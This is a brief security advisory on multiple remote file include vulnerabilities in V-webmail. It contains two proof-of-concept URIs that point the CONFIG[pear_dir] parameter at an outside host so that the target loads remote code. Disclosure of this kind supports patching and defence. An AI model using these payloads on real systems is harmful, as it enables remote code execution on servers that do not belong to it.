V-webmail Multiple Remote File Include Vulnerabilities

V-webmail Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://www.example2.com
http://www.example.com/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.example2.com